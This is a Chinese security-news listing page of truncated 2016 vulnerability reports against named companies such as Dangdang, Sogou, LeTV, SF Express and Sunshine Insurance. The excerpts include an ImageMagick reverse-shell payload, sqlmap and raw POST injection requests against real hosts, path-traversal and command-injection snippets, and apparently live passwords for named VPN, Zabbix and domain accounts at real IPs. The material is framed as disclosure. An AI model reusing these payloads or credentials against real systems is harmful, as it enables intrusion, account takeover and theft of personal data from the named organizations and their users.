欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!
  • 用友某系统多处注入漏洞
  • 首先,该接口是无需权限访问的。已http://**.**.**.**/bugs/wooyun-2010-0178322为例:**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl**.**.**.**:8080/uapws/service/nc.itf.bd.c......
  • 所属分类:漏洞公告 更新时间:2016-07-18 相关标签: 阅读全文...
  • 酷我音乐某站存在sql注入漏洞
  • 酷我音乐某站存在sql注入1.http://**.**.**/album/h/xinQingViewid=8&device=&user_id=418923 注入点:id注入类型:Type: boolean-based blind ROOT注入 修复方案: 参数过滤 ...
  • 所属分类:漏洞公告 更新时间:2016-07-17 相关标签: 阅读全文...
  • 神器而已之当当某站Struts2命令执行漏洞(绕过过滤)
  • 从TangScan提交插件赚取汤圆购买了另一个插件,扫到当当一个站点的Struts2命令执行: 漏洞地址:http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm此处应有防护或过滤,之前的Payload都不好使了。测试P......
  • 所属分类:漏洞公告 更新时间:2016-07-17 相关标签: 阅读全文...
  • 京港地铁主站存在SQL注入漏洞
  • 京港地铁主站存在SQL注入漏洞 http://**.**.**.**/index.html 抓包 POST /Ajax/AjaxUser.aspx HTTP/1.1 Host: **.**.**.** User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0 ......
  • 所属分类:漏洞公告 更新时间:2016-07-16 相关标签: 阅读全文...
  • 映客app最新一处命令执行漏洞
  • 最新的imagemagic的漏洞payload为 push graphic-context viewbox 0 0 640 480 image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1" pop graphic-context 在于修改头像处 反弹shell......
  • 所属分类:漏洞公告 更新时间:2016-07-16 相关标签: 阅读全文...
  • 福建某社保存在SQL注入漏洞
  • 福建某社保存在sql注入漏洞可执行root权限 root@kali:~# sqlmap -u "http://**.**.**.**/custom/grzhye.aspx?id0000=1234567890&page=1&xming0=1" _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-2015111......
  • 所属分类:漏洞公告 更新时间:2016-07-14 相关标签: 阅读全文...
  • 完美绕过安全狗进行SQL注入/可使用sqlmap进行注入
  • 完美绕过安全狗进行SQL注入/可使用sqlmap进行注入不能使用sqlmap的能叫完美? 研究比较新版本的安全狗都知道,在处理url是不会考虑&这个符号,当做平常的符号并且会把/**/之间的内容替换为空,那么问题来了 a......
  • 所属分类:漏洞公告 更新时间:2016-07-14 相关标签: 阅读全文...
  • 福建网龙某数据平台一处SQL注入
  • 福建网龙某数据平台一处SQL注入 目标:syjf.data.99.com检测发现以下地方存在SQL注入:(POST中的platformName/productName,Stacked query) POST /MobileGameReporting/Services/MobileGameServices.asmx/GetCha......
  • 所属分类:漏洞公告 更新时间:2016-07-14 相关标签: 阅读全文...
  • 91.com某服务器弱口令登录后执行命令
  • 地址:http://59.56.25.29/zabbix 账号:admin密码:zabbix如下图: 可以看到是91.com的服务器,下面的图片可以看到内网大量服务器。。。 然后在脚本处添加反弹shell的脚本。地址:http://59.56.25.29/zabbi......
  • 所属分类:漏洞公告 更新时间:2016-07-14 相关标签: 阅读全文...
  • Oracle EBusiness某版本文件遍历读取漏洞
  • 在某次扫描中发现一处文件遍历读取: http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml? 发现是oracle某个系统 利用特征URL google hacking,发现国外......
  • 所属分类:漏洞公告 更新时间:2016-07-13 相关标签: 阅读全文...
  • 顺丰某系统修复不当导致getshell
  • 1#dll后缀文件仍然允许下载,虽然关闭了目录浏览,但iis配置不当http://218.17.224.215:8082/obj/Debug/SFWCFService.dll 2#程序虽然修改了(pwd没有写死了),但关键的是pwd未改仍然是zxb@fjw 3#虽然savepath......
  • 所属分类:漏洞公告 更新时间:2016-07-13 相关标签: 阅读全文...
  • 天天果园某分站存在SQL注入漏洞
  • 天天果园某分站存在SQL注入 http://180.167.72.216:88/login/Login.jsp http://180.167.72.216:88//services/MobileService?wsdl 采用别人的中转脚本 $in0=$_GET['name']; #$in0 = $in0."' and 'a' = 'a"......
  • 所属分类:漏洞公告 更新时间:2016-07-13 相关标签: 阅读全文...
  • 奥鹏教育某处未授权访问可影响大量学生信息
  • 在http://learn.open.com.cn/登入首页-详细信息-查看 查看照片地址 发现目录泄露了http://oemsresource.open.com.cn/Attachment/ExportTemp/OEMS/PictureTemp/20160711/ 所有学员的照片 学员、老师信息 ......
  • 所属分类:漏洞公告 更新时间:2016-07-13 相关标签: 阅读全文...
  • 华住酒店某处可快速撞库
  • mgm.huazhu.com登录没有验证码,通过GET不安全的登录方式 GET //AuthService/CheckPAccount?callback=jQuery21307776533881281722_1464239949918&Account=1585518&password=zm114&guid=11&openid......
  • 所属分类:漏洞公告 更新时间:2016-07-13 相关标签: 阅读全文...
  • 阳光保险敏感信息泄露导致可能进入内网系统
  • 阳光保险的桌面虚拟化系统 https://xen.sinosig.com/vpn/index.html #1首先去找信息泄露 - 百度文库 http://wenku.baidu.com/view/571385ee7e21af45b307a8de.html?from=search 得知用户域密码为ygbx123! http:......
  • 所属分类:漏洞公告 更新时间:2016-07-13 相关标签: 阅读全文...
  • 搜狗某站SQL注入可读系统文件
  • 搜狗某站SQL注入可读系统文件 $ python sqlmap.py -u "http://union.app.sogou.com/index.php/aa.php?s=/Index/login" --data "username=CasterJs*&=CasterJs&product=&password=CasterJs" --sql-shell......
  • 所属分类:漏洞公告 更新时间:2016-07-12 相关标签: 阅读全文...
  • 阳光保险某险种业务系统任意用户密码重置
  • 系统:http://chexian.sinosig.com/unManage/unAgent_forwardUnAgentLogin.action过程如下:1、输入我们自己注册的账号 2、下发验证码,输入收到的验证码,进入下一步 3、来到输入新密码界面,保留该页面 4......
  • 所属分类:漏洞公告 更新时间:2016-07-12 相关标签: 阅读全文...
  • 亚马逊云环境存在远程命令执行漏洞
  • Elastic Beanstalk环境是自动搭建web环境的aws产品,存在imagickmagick最新远程命令执行漏洞,上一次的补丁打了: $cmd=$_GET['cmd']; echo $cmd; new Imagick('|'."$cmd".''); ?> http://52.39.235.119/im.p......
  • 所属分类:漏洞公告 更新时间:2016-07-12 相关标签: 阅读全文...
  • 乐视网漏洞一枚(VPN+内网)
  • 乐视网https://vpn.le.com/yuqing leshi@123 内网太大小伙伴都不容易 就到这里 不进一步了ok 修复方案: 强制上策略吧 ...
  • 所属分类:漏洞公告 更新时间:2016-07-11 相关标签: 阅读全文...
  • 本类最新更新
    • 本类热门文章
      • 最新下载
        • 标签云集